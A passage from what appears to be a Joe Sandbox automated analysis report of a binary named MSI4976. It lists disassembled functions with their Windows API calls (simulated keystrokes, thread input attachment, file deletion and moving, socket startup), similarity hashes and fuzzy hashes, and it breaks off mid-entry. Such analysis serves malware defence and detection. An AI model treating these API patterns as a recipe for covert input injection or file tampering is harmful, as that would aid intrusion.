                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                        • Instruction ID: efcd5da6d0e561f5de143c6a86038751a45686e28d9c9e5f8d0cf2fd788226b2
                                        • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                        • Instruction Fuzzy Hash: 9001DB39504601EFCB237F29E881E5B7BE89F81370F61453EF8548B651DB31A85187A1
                                        Function 00325116 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(00000000,?,00000000,?,?,?,00325A39,?,?,?,-00000003,00000000,00000000), ref: 0032514E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID:
                                        • API String ID: 3964851224-0
                                        • Opcode ID: 0bdd90dc909f2ceae0fcbe950187b46add66e2b74dce35f78214b8a7080618dc
                                        • Instruction ID: 90702ea0c4cd66f68c1b65d53ce670687057eb3f42b48b2af2c63ca39375981d
                                        • Opcode Fuzzy Hash: 0bdd90dc909f2ceae0fcbe950187b46add66e2b74dce35f78214b8a7080618dc
                                        • Instruction Fuzzy Hash: A6F0F679201A31EBCB175F15E80072AF7A9EF40F60F018129E5494AA50CB70E930C7C4
                                        Function 003795AF Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSAStartup.WS2_32(00000202,?), ref: 003795C9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: 5b24a155b30226297467cb602d4df6ba316d2db50874632993f8146e801c0dc1
                                        • Instruction ID: 5edc8fcfd8f8ccb72a5464af0d7f9e87e6e9beec5e8d94ef9d471f4ebd425f76
                                        • Opcode Fuzzy Hash: 5b24a155b30226297467cb602d4df6ba316d2db50874632993f8146e801c0dc1
                                        • Instruction Fuzzy Hash: 30E0E5376042146BC310EA64DC45AABB799BF85730F04871ABDA48B2C1DA30D814C3C1
                                        Function 00323E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNEL32(?,?,?,?,?,003234E2,?,00000001), ref: 00323E6D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 4330c00a57af26f4c404cc89f8aa16a6438a01ad2bc086275388b86cca057306
                                        • Instruction ID: 5f1bff90a9f9f39389cb10cce9ca30fcaa8c97f37ddcd5dae6813191daad4ead
                                        • Opcode Fuzzy Hash: 4330c00a57af26f4c404cc89f8aa16a6438a01ad2bc086275388b86cca057306
                                        • Instruction Fuzzy Hash: B0F03972101761CFCB369F64E490816BBF4EF147153268E3EE1D686A21C739A948DF00
                                        Function 003679F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00367A11
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FolderPath_memmove
                                        • String ID:
                                        • API String ID: 3334745507-0
                                        • Opcode ID: 81a954ba9d5d08010d2dfe3c7cacf3531e88aee148a4a18d06d0eb851ebc7292
                                        • Instruction ID: b4e5e7e6d1253c2965adada5cdce181edf5932dfa52fdc0c26ab7413bbbea039
                                        • Opcode Fuzzy Hash: 81a954ba9d5d08010d2dfe3c7cacf3531e88aee148a4a18d06d0eb851ebc7292
                                        • Instruction Fuzzy Hash: 32D05EA65002282FDB50E6349C09DFB36ADD744244F0002A0786DD2042E920AE4586F0
                                        Function 0032193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00321952
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSendTimeout
                                        • String ID:
                                        • API String ID: 1599653421-0
                                        • Opcode ID: 7f85c196a3040cf4fbd96df197af387a5c6641320a8bf199ac7d594487322891
                                        • Instruction ID: 77211d97572474a0da0e213e580fefc4b90e3af69ca10d745b1934f3b28e9627
                                        • Opcode Fuzzy Hash: 7f85c196a3040cf4fbd96df197af387a5c6641320a8bf199ac7d594487322891
                                        • Instruction Fuzzy Hash: F2D012F16902087EFB018761CD07DBB775CD722F81F4046617E06D64D1D6649E098570
                                        Function 00376FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: TextWindow
                                        • String ID:
                                        • API String ID: 530164218-0
                                        • Opcode ID: fa8f704a2007b833bc2efed48639d012fb5521f30a49e1c88fe3c31b0bfb56ca
                                        • Instruction ID: e4f96a721df1d252d57948e090b20deb285509cf0dc4899cfe9647bdce5b42ac
                                        • Opcode Fuzzy Hash: fa8f704a2007b833bc2efed48639d012fb5521f30a49e1c88fe3c31b0bfb56ca
                                        • Instruction Fuzzy Hash: 50D06C362106249F8B12EB99E845C8ABBE9EB4D7107418062F60A9B631DA21EC909B90
                                        Function 00324FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,003949DA,?,?,00000000), ref: 00324FC4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 2a731b8042e2dc4401c3e08a1684cb7adbd9af6e1eda8581ad36e968992bdfa0
                                        • Instruction ID: 09863e5dc4b1c0391bc815bddbcdeae065f1b7002b18db4fa977b34099e138d6
                                        • Opcode Fuzzy Hash: 2a731b8042e2dc4401c3e08a1684cb7adbd9af6e1eda8581ad36e968992bdfa0
                                        • Instruction Fuzzy Hash: 91D0C974640208BFEB00CB90DC4BF9A7BBCEB05718F200194F601A62D0D2F2BE408B55
                                        Function 00394DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: be7059ab73f3d80cb1fad5d40b1b00664568055418fbb93fe814e6220565a8af
                                        • Instruction ID: 30d1361c530ef963e8e1353eaa4c926718362feab1f67ac0228d8b6d3333f91f
                                        • Opcode Fuzzy Hash: be7059ab73f3d80cb1fad5d40b1b00664568055418fbb93fe814e6220565a8af
                                        • Instruction Fuzzy Hash: 43D0C9B15002009BE7225F6AE94478ABBE8AF55300F248829F5E686550D776B8C29B11
                                        Function 00344129 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __wfsopen
                                        • String ID:
                                        • API String ID: 197181222-0
                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                        • Instruction ID: 7210d973eb7a82886160f57bd615c6c62754c0c3ff20bf9b9c06cbb6c3c7d6c2
                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                        • Instruction Fuzzy Hash: 5EB0927244030C77EE022A82EC02B493B599B50660F008020FB0C1C161A673AAA09A89
                                        Function 003250EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNEL32(?,?,?,00395950), ref: 0032510C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 9cdc76c50408b2c345513cf0b627e8e7bbc2a0e7231c84795977bdbfed97eee0
                                        • Instruction ID: e8e7d9c62d3fc3664d3eca15382e15691fd32d49b08a9f1be049b4a9979ebf40
                                        • Opcode Fuzzy Hash: 9cdc76c50408b2c345513cf0b627e8e7bbc2a0e7231c84795977bdbfed97eee0
                                        • Instruction Fuzzy Hash: 58E0B675400B12CBC6324F1AE804412FBF9FFE13613228A2FD4E682A60DBB05986DB90

                                        Non-executed Functions

                                        Function 0038F5D0 Relevance: 70.6, APIs: 37, Strings: 3, Instructions: 630windowkeyboardnativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0038F64E
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0038F6AD
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0038F6EA
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0038F711
                                        • SendMessageW.USER32 ref: 0038F737
                                        • _wcsncpy.LIBCMT ref: 0038F7A3
                                        • GetKeyState.USER32(00000011), ref: 0038F7C4
                                        • GetKeyState.USER32(00000009), ref: 0038F7D1
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0038F7E7
                                        • GetKeyState.USER32(00000010), ref: 0038F7F1
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0038F820
                                        • SendMessageW.USER32 ref: 0038F843
                                        • SendMessageW.USER32(?,00001030,?,0038DE69), ref: 0038F940
                                        • SetCapture.USER32(?), ref: 0038F970
                                        • ClientToScreen.USER32(?,?), ref: 0038F9D4
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0038F9FA
                                        • ReleaseCapture.USER32 ref: 0038FA05
                                        • GetCursorPos.USER32(?), ref: 0038FA3A
                                        • ScreenToClient.USER32(?,?), ref: 0038FA47
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0038FAA9
                                        • SendMessageW.USER32 ref: 0038FAD3
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0038FB12
                                        • SendMessageW.USER32 ref: 0038FB3D
                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0038FB55
                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0038FB60
                                        • GetCursorPos.USER32(?), ref: 0038FB81
                                        • ScreenToClient.USER32(?,?), ref: 0038FB8E
                                        • GetParent.USER32(?), ref: 0038FBAA
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0038FC10
                                        • SendMessageW.USER32 ref: 0038FC40
                                        • ClientToScreen.USER32(?,?), ref: 0038FC96
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0038FCC2
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0038FCEA
                                        • SendMessageW.USER32 ref: 0038FD0D
                                        • ClientToScreen.USER32(?,?), ref: 0038FD57
                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0038FD87
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0038FE1C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                        • String ID: @GUI_DRAGID$@U=u$F
                                        • API String ID: 3461372671-1007936534
                                        • Opcode ID: 8d147f66bfacec84f59479c1514130628eabf8a8db35f18f1296cf2f49bc2455
                                        • Instruction ID: b9c0d124b2192e2a09470b8e2a48a8d3c1a1d35d55f6753a6c81356daf1d5012
                                        • Opcode Fuzzy Hash: 8d147f66bfacec84f59479c1514130628eabf8a8db35f18f1296cf2f49bc2455
                                        • Instruction Fuzzy Hash: 4F32D070204741AFD722EF24C884EAABBE9FF49354F1406A9F6958B2B1D730ED04CB51
                                        Function 0038A8DC Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 574windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0038AFDB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: %d/%02d/%02d$@U=u
                                        • API String ID: 3850602802-2764005415
                                        • Opcode ID: 3c64445cdaf3d5b97bb3715d2dac03398333992e0ee88b469ef7fa70172328da
                                        • Instruction ID: fc2d60ec58ee963418e67fed4974e7ca10a86d2b381ac6767f1362a7dbbb2238
                                        • Opcode Fuzzy Hash: 3c64445cdaf3d5b97bb3715d2dac03398333992e0ee88b469ef7fa70172328da
                                        • Instruction Fuzzy Hash: F112F0B1500704ABEB2AAF64CC49FAE7BF8EF45310F10429AF606DF6A0DB749941CB11
                                        Function 0033F78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 0033F796
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00394388
                                        • IsIconic.USER32(000000FF), ref: 00394391
                                        • ShowWindow.USER32(000000FF,00000009), ref: 0039439E
                                        • SetForegroundWindow.USER32(000000FF), ref: 003943A8
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003943BE
                                        • GetCurrentThreadId.KERNEL32 ref: 003943C5
                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 003943D1
                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003943E2
                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003943EA
                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 003943F2
                                        • SetForegroundWindow.USER32(000000FF), ref: 003943F5
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039440A
                                        • keybd_event.USER32(00000012,00000000), ref: 00394415
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039441F
                                        • keybd_event.USER32(00000012,00000000), ref: 00394424
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039442D
                                        • keybd_event.USER32(00000012,00000000), ref: 00394432
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039443C
                                        • keybd_event.USER32(00000012,00000000), ref: 00394441
                                        • SetForegroundWindow.USER32(000000FF), ref: 00394444
                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0039446B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 4125248594-2988720461
                                        • Opcode ID: af3f372210142aec6a6222e4832e90cf99e01290c04fbfc04da0c47f12f9977b
                                        • Instruction ID: dc1ba3744c1da6bf8edef0a2dc35177e64e2769a339bc32f16765b705b8f1adf
                                        • Opcode Fuzzy Hash: af3f372210142aec6a6222e4832e90cf99e01290c04fbfc04da0c47f12f9977b
                                        • Instruction Fuzzy Hash: FE318671A40318BFEF226B759C89FBF3E6CEB46B54F114025FA05EA1D0D6B15D01AEA0
                                        Function 00366B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 003231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003231DA
                                          • Part of subcall function 00367B9F: __wsplitpath.LIBCMT ref: 00367BBC
                                          • Part of subcall function 00367B9F: __wsplitpath.LIBCMT ref: 00367BCF
                                          • Part of subcall function 00367C0C: GetFileAttributesW.KERNEL32(?,00366A7B), ref: 00367C0D
                                        • _wcscat.LIBCMT ref: 00366B9D
                                        • _wcscat.LIBCMT ref: 00366BBB
                                        • __wsplitpath.LIBCMT ref: 00366BE2
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00366BF8
                                        • _wcscpy.LIBCMT ref: 00366C57
                                        • _wcscat.LIBCMT ref: 00366C6A
                                        • _wcscat.LIBCMT ref: 00366C7D
                                        • lstrcmpiW.KERNEL32(?,?), ref: 00366CAB
                                        • DeleteFileW.KERNEL32(?), ref: 00366CBC
                                        • MoveFileW.KERNEL32(?,?), ref: 00366CDB
                                        • MoveFileW.KERNEL32(?,?), ref: 00366CEA
                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00366CFF
                                        • DeleteFileW.KERNEL32(?), ref: 00366D10
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00366D37
                                        • FindClose.KERNEL32(00000000), ref: 00366D53
                                        • FindClose.KERNEL32(00000000), ref: 00366D61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
